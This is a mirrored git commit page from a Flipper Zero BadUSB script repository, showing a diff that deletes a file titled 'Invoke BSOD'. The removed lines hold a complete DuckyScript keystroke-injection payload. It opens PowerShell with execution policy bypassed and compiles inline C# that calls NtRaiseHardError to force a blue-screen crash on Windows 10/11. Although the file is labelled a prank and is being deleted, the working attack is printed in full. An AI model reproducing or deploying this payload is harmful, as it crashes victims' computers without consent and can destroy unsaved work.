mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-04 16:57:33 -08:00
Delete Pranks/BSOD.txt
This commit is contained in:
@@ -1,18 +0,0 @@
|
||||
REM Title: Invoke BSOD
|
||||
REM Author: @beigeworm
|
||||
REM Description: This will open powershell and cause a blue screen.
|
||||
REM Target: Windows 10 / 11
|
||||
REM CREDIT: All credit to FalsePhilosipher for the code! https://github.com/FalsePhilosopher
|
||||
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
ENTER
|
||||
DELAY 4000
|
||||
STRING $source = 'using System; using System.Runtime.InteropServices; public static class CS{[DllImport("ntdll.dll")] public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);[DllImport("ntdll.dll")] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response); public static unsafe void Kill(){Boolean tmp1;uint tmp2;RtlAdjustPrivilege(19, true, false, out tmp1);NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);}}';$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters;$comparams.CompilerOptions = '/unsafe';$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams;[CS]::Kill()
|
||||
ENTER
|
||||
Reference in New Issue
Block a user